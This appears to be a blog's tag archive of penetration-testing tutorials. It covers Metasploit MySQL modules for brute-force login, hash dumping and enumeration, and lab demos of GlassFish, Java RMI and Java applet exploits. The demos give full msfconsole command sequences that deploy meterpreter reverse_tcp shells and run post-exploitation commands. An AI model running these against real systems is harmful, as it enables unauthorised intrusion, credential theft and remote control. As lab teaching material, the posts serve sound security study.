Tag Archives: Oracle

Metasploit MySQL Auxiliary Modules

Metasploit provide some MySQL database auxiliary modules who will permit you to scan the running version, do brute force login, execute sql queries and gather some useful informations.

You can find all these auxiliary modules through the Metasploit search command.

MySQL version scanner (mysql_version)

To invoke this auxiliary module just type the following command :

Just provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize version scans, just increase the number of concurrent threads by setting the “THREADS” variable.

MySQL authentication brute force login (mysql_login)

To invoke this auxiliary module just type the following command :

This module attempts to authenticate against a MySQL instance using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. Metasploit doesn’t provide default “USER_FILE“, default “PASS_FILE” and default “USERPASS_FILE“. You can use SkullSecurity password lists, or my own list how is updated regularly. In order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be a an unique IP address, an IP addresses range or a file.

Valid login attempts are displayed in green and non valid in red.

MySQL generic SQL query execution (mysql_sql)

To invoke this auxiliary module just type the following command :

This module will allow you to execute a simple SQL query against  a MySQL instance. The default SQL query will check the running version of MySQL database. You will require valid login and password previously discovered with the “mysql_login” auxiliary module. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address.

Some useful SQL MySQL queries for pen testing are available on pentestmonkey website.

MySQL password hashdump (mysql_hashdump)

To invoke this auxiliary module just type the following command :

Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize scans, just increase the number of concurrent threads by setting the “THREADS” variable. You also need to have valid “USERNAME” and “PASSWORD“, maybe obtained through the “mysql_login” auxiliary module.

MySQL enumeration (mysql_enum)

To invoke this auxiliary module just type the following command :

This auxiliary module will allow you to gather useful informations from a MySQL server :

  • The MySQL version
  • The MySQL OS compilation target
  • The server architecture
  • The server hostname
  • The MySQL datas directory location
  • If logging of queries and logins is activated or not, and log files location
  • If the old password hashing algorithm support is activated or not
  • If local files loading (infile) is activated or not
  • If logins with old Pre-4.1 passwords is authorized or not
  • If the “–skip-grant-tables” option is activated or not
  • If symlinks are authorized to be used for database files
  • If table merges are allowed
  • If the “–safe-show-database” option is activated or not
  • If SSL connexions are enabled or not
  • All accounts with their password hashes
  • List of accounts that can log in with SSL if SSL is enabled
  • List of all accounts with “GRANT“, “CREATE USER”, RELOAD“, “SHUTDOWN“, “SUPER“, “FILE” and “PROCESS” privileges.
  • List of all accounts with “SELECT“, “INSERT“, “UPDATE“, “DELETE“, “CREATE” and “DROP” privileges.
  • List of all anonymous accounts.
  • List of all accounts without passwords
  • List of all accounts with host wildcard authorized access.
To use this auxiliary module you need to have a access to the database with a privileges user account, maybe gathered with the “mysql_login” auxiliary module. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address.

CVE-2011-0807 : Sun/Oracle GlassFish Server Authenticated Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Jason Bowes and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2010-09-23
Coordinated public release of the vulnerability the 2011-04-19
Metasploit PoC provided the 2011-08-04

PoC provided by :

juan vazquez
Joshua Abraham
sinn3r

Reference(s) :

CVE-2011-0807
ZDI-11-137

Affected version(s) :

Sun GlassFish Enterprise Server 2.1, 2.1.1, 3.0.1
Java System Application Server 9.1

Tested on Windows XP SP3 with :

Sun GlassFish Enterprise Server 3.0.1

Description :

This module logs in to an GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads, and executes commands via deploying a malicious WAR. On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x this module will try to bypass authentication instead by sending lowercase HTTP verbs.

Commands :

use exploit/multi/http/glassfish_deployer
set RHOST 192.168.178.48
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Java RMI Server Insecure Default Configuration Java Code Execution

Timeline :

Vulnerability discovered by mihi
Metasploit exploit released the 2011-07-15

PoC provided by :

mihi

Reference(s) :

Oracle Java RMI documentation

Affected version(s) :

All JSE versions

Tested on Windows XP SP3 with :

JSE 7 (build 1.7.0-b147)

Description :

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

Commands :

On windows target box :

cd C:\Program Files\Java\jre7\bin
start rmiregistry.exe

On Metasploit box :

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.178.48
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-4452 : Oracle Java Applet2ClassLoader Remote Code Execution Exploit

Timeline :

Vulnerability discovered by Frederic Hoguin
Vulnerability transmitted to ZDI by Frederic Hoguin
Vulnerability reported to the vendor by ZDI the 2010-09-28
Coordinated public release of advisory the 2011-02-15
Vulnerability details publicly released by Frederic Hoguin the 2011-03-11
Metasploit PoC provided the 2011-03-15

PoC provided by :

Frederic Hoguin
jduck

Reference(s) :

CVE-2010-4452
ZDI-11-084
OSVDB-71193
Oracle

Affected version(s) :

Oracle JRE 6 & JDK 6 Update 23 and before

Tested on Windows XP SP3 with :

Oracle JRE 6 Update 16

Description :

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A “codebase” parameter that points at a trusted directory 2. A “code” parameter that is a URL that does not contain any dots the applet will run outside of the sandbox.

Commands :

use exploit/windows/browser/java_codebase_trust
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid